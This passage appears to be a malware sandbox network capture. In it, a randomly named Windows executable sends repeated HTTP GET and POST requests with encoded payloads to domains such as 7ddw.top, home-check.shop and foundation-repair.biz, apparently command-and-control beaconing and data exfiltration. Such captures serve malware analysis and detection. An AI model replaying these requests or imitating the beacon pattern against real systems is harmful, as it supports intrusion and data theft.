x-request-id: d69130bb-fd58-4011-8f93-d25666d452fb-1728473934
server-timing: processing;dur=120
content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.11.20 | 49765 | 23.227.38.74 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:38:57.025243998 CEST | 555 | OUT | GET /y82c/?FlS=3ldH5dkH-dBLf&9B6h=sLiZbFdk0bb3LADauL00iEPz4ezLfDKRfqlDl/6kvE4DPkuqbR8aqfEySQ7vKfLRZ5tGFHhzrS3SF8murk9fEOV453YSzWktCGZAKUV3HiBT9SXvdO/vw9M= HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cannulafactory.top
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:38:57.190778971 CEST | 1289 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:57 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              x-sorting-hat-podid: 156
                                                                                                                                                                                                                                                              x-sorting-hat-shopid: 68519428253
                                                                                                                                                                                                                                                              x-storefront-renderer-rendered: 1
                                                                                                                                                                                                                                                              location: https://cannulafactory.top/y82c?FlS=3ldH5dkH-dBLf&9B6h=sLiZbFdk0bb3LADauL00iEPz4ezLfDKRfqlDl/6kvE4DPkuqbR8aqfEySQ7vKfLRZ5tGFHhzrS3SF8murk9fEOV453YSzWktCGZAKUV3HiBT9SXvdO/vw9M=
                                                                                                                                                                                                                                                              x-redirect-reason: https_required
                                                                                                                                                                                                                                                              x-frame-options: DENY
                                                                                                                                                                                                                                                              content-security-policy: frame-ancestors 'none';
                                                                                                                                                                                                                                                              x-shopid: 68519428253
                                                                                                                                                                                                                                                              x-shardid: 156
                                                                                                                                                                                                                                                              vary: Accept
                                                                                                                                                                                                                                                              powered-by: Shopify
                                                                                                                                                                                                                                                              server-timing: processing;dur=11;desc="gc:1", db;dur=4, asn;desc="174", edge;desc="EWR", country;desc="US", pageType;desc="404", servedBy;desc="fg5l", requestID;desc="0f8409e5-8fe5-47a9-b3a6-8a6e241e9a63-1728473937"
                                                                                                                                                                                                                                                              x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1
                                                                                                                                                                                                                                                              x-request-id: 0f8409e5-8fe5-47a9-b3a6-8a6e241e9a63-1728473937
                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d7eI1vQj5GQ8F%2FkAeGlnFlOWW1L1sYE1%2FqTA5jFrfMO5L5LAscfVb7XYqp2hgZ0ggNaruKVbdg%2FV0vQoulC7%2BNTXRK8UUOUIHy8kfDFfCZWWiechzlvL7jwh8TTBE2to37OV6G3uKHI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_
                                                                                                                                                                                                                                                              Data Raw:
                                                                                                                                                                                                                                                              Data Ascii:
Oct 9, 2024 13:38:57.190790892 CEST | 248 | IN |
Data Ascii: ge":604800}
Server-Timing: cfRequestDuration;dur=59.999943
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
Server: cloudflare
CF-RAY: 8cfe165ab8944386-EW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.11.20 | 49766 | 154.23.184.207 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:39:02.609004974 CEST | 799 | OUT | POST /pcjw/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.7ddw.top
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.7ddw.top
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.7ddw.top/pcjw/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=FpNaodwtk1yjLsTtS8B0JCuVhTT8LyuBL+L2QuF1idwMh1WWTpzZIYdhwAFgfC4vscmcYYezxkyOkv2jmSwmAkJ7+DR8AY8l/oeI/NVb54iPC7ynH/xAGHIVFtanIHV9nFPLE4qD0jBezi2EhQiF1F6Ojz8B0t7PFPzuEMCNWSe97YihSUuTYzzx15FZ7gZEGg==
Oct 9, 2024 13:39:02.904079914 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:39:02 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              ETag: "66a62378-94"
                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.11.20 | 49767 | 154.23.184.207 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:39:05.442235947 CEST | 819 | OUT | POST /pcjw/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.7ddw.top
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.7ddw.top
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.7ddw.top/pcjw/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=FpNaodwtk1yjNNjtVf50FyuSkTT8eCuNL+H2QvxlhuUMiQ6WUtnZBIdhoQFlAy4mscq+YaazxlSOkuGjmlkpPUJ1nTR+N48l/oeI/J9x54KPDLinFaNHFHIWSdanMHVhnFPpE5290mFeznKEhiaGs16I9D9gkvarIcP5M8LQUyKU3uz7Pma3bgvDxJ8x5iYfbt+Uh587+GrdJwusC4y93/w=
Oct 9, 2024 13:39:05.737360954 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:39:05 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              ETag: "66a62378-94"
                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.11.20 | 49768 | 154.23.184.207 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:39:08.267095089 CEST | 2578 | OUT | POST /pcjw/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.7ddw.top
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.7ddw.top
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.7ddw.top/pcjw/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:39:08.267163038 CEST | 5390 | OUT |
                                                                                                                                                                                                                                                              Data Ascii: lrVmbT0sSRELYQ0zfjVy6wOMOcCWQq3Q879vCG9vTxh8jwS2Kx7nuanigi1+VdpnSONHHwI69JvTzfCNfgRJ9bOFwkkG+VVMnYa6pErTqA9v6ONatMDjDezqPUlhFr3jHPogfzGFE+PvLmDu9ZLak9I3NuM8RUuqc17mnOMingp+dqvAhUIfd+V0RMuG2FaIhtDhCXsJP/z41aiMdJKRlh+Mv84cNOQv8ZlPQ3mYTuORIw//K05
Oct 9, 2024 13:39:08.563009024 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:39:08 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              ETag: "66a62378-94"
                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.11.20 | 49769 | 154.23.184.207 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:39:11.092348099 CEST | 545 | OUT | GET /pcjw/?9B6h=Irl6roAKlXX+S/z4d/JGSgOFtgPcZWv0Ad/WGuEavtEpunmIUZ/WLqk+3ThtGR85672FVpbJ7guSoPSbpRkmFzROuSw6a7kz1v/qj+IPw73pHtOII/dFP3E=&FlS=3ldH5dkH-dBLf HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.7ddw.top
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:39:11.387381077 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:39:11 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              ETag: "66a62378-94"
                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.11.20 | 49770 | 185.230.15.3 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:39:16.736579895 CEST | 820 | OUT | POST /ns8q/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.home-check.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.home-check.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.home-check.shop/ns8q/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=Fl3Y1slJcSGC2KeULugnWaY5ofaYBYaVPaoGjYj/5q/WXh53KUpMRXprGgftF/va/YMeTB9pDhjukz9XBiijkfbEqEiAu/L+W9nHQaX09PTaXKXuTezwYWUwoCmzJwjwic4eK6LskKCp0fUlN76E94sckFs1aR8bTZ0F77TDYDCZNtugJnF9srRkBzqTsqQzcQ==
Oct 9, 2024 13:39:17.016904116 CEST | 292 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:39:16 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.11.20 | 49771 | 185.230.15.3 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:39:19.491672993 CEST | 840 | OUT | POST /ns8q/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.home-check.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.home-check.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.home-check.shop/ns8q/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=Fl3Y1slJcSGCweiUJJ0nfaY6xfaYP4bSPakGjczv+ZXWXAJ3LWBMSXprJAepGPvn/YRjTABpDgDukxlXCRasmPaisEiCzPL+W9nHQaTe9PLaX6HuS7PzW2UvhimzNwj8ic48K7W5kPGp0bYlMvuHoosggFtyeEZLVa91/4DsRBiOFb/6UVxZv4NWFDT7uoRoBSvvGTfC+OvguSPV8V2uedk=
Oct 9, 2024 13:39:19.772253990 CEST | 292 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:39:19 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.11.20 | 49772 | 185.230.15.3 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:39:22.257788897 CEST | 2578 | OUT | POST /ns8q/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.home-check.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.home-check.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.home-check.shop/ns8q/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:39:22.257860899 CEST | 5411 | OUT
                                                                                                                                                                                                                                                              Data Ascii: 3yqXQIfUyOLCEOBRq7hM9Fpa8w+ZdPKR4hbb5nyvdrsJLwhcoMWuguzGzh/G+MTYV8RP8swVbGDZp+GgfyJDECtbl04ha3DDC61333ZirSCUzpqkAZMb4ql+/krK7fEVzTtf9LQhX+5v4UoKGJpuAbe0+Xslabbupk6NUYMKEGc9qZzX0N2zfRextCv99KRhEXEE3qQefGjXeX29hGoLyTJgsQdONbojLeMa+/eS1OesRXIVeJ2
Oct 9, 2024 13:39:22.538935900 CEST | 292 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:39:22 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.11.20 | 49773 | 185.230.15.3 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:39:25.019814968 CEST | 552 | OUT | GET /ns8q/?9B6h=Inf42ZVLRw6HwISCOPUKL9E43+GpX4bkPpg82teOxrbDSww0PzIRQy8gHWXiaO2t1uZOdy10GUfR4hRxDB6Ts5zJpETBxtnbe//OQKeepMDnU8nxUbj7e0s=&FlS=3ldH5dkH-dBLf HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.home-check.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:39:25.300543070 CEST | 254 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:39:25 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Data Ascii: 46<h1>Related Page not found</h1><p>Sorry, we cannot find that page.</p>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.11.20 | 49774 | 199.59.243.227 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:39:30.422291994 CEST | 838 | OUT | POST /enra/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.foundation-repair.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.foundation-repair.biz
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.foundation-repair.biz/enra/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=JshyfeaUeVAP9N8JKO9nYJN2WaGcaSZieRrcZm1JqqpBhsZTpo+U1DVH/ztiB6TGzP1dqzAkqbKB4Ff7bfGgVUkWQfYfuM9FuEpZmJ8w7Rp/rSVUlJM6StCitQEnYufBb9tuH1VeRWLCn8YAzemJtiRZ3ErPMiL7qtklIxwpL0iHZ4MXwpCTM2WhKbVjjSRFGw==
Oct 9, 2024 13:39:30.523932934 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:39:30 GMT
                                                                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              content-length: 1154
                                                                                                                                                                                                                                                              x-request-id: 3a07fcfb-0963-4445-9b2b-5add4b871b74
                                                                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JUMrpzS0JSo3kDHGSd/xi71RDfm47M+ByYOqjzjPWIcDOSqxFj69EvnNniURFyze+eaWU9XrKZoupVKXUE0SVA==
                                                                                                                                                                                                                                                              set-cookie: parking_session=3a07fcfb-0963-4445-9b2b-5add4b871b74; expires=Wed, 09 Oct 2024 11:54:30 GMT; path=/
                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JUMrpzS0JSo3kDHGSd/xi71RDfm47M+ByYOqjzjPWIcDOSqxFj69EvnNniURFyze+eaWU9XrKZoupVKXUE0SVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Oct 9, 2024 13:39:30.524054050 CEST | 554 | IN
                                                                                                                                                                                                                                                              Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiM2EwN2ZjZmItMDk2My00NDQ1LTliMmItNWFkZDRiODcxYjc0IiwicGFnZV90aW1lIjoxNzI4NDczOTcwLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZm91bmRhdGlvbi1yZXB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.11.20 | 49775 | 199.59.243.227 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:39:33.045171022 CEST | 858 | OUT | POST /enra/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.foundation-repair.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.foundation-repair.biz
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.foundation-repair.biz/enra/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=JshyfeaUeVAP7tMJGNVnIZNpTaGcTyZ5eRvcZnBnqc5BgOBTop+UyDVHqDt7LaTZzP4oq3EkqfiB4Fv7asehakkUY/Ydw89FuEpZmIZr7Rx/rjlUltQ5M9Ct6gEnOefdb9sLH1lwRUzCn8oAzvmIkiQSqUqHDBnxmdUoJTUECWOcROdNtb23PlKTOrsLhQQebw1LMib+OuOCCmLKq852YzU=
Oct 9, 2024 13:39:33.146883965 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:39:32 GMT
                                                                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              content-length: 1154
                                                                                                                                                                                                                                                              x-request-id: 32e3ccf8-df8d-483f-a613-9dc1098ad73a
                                                                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
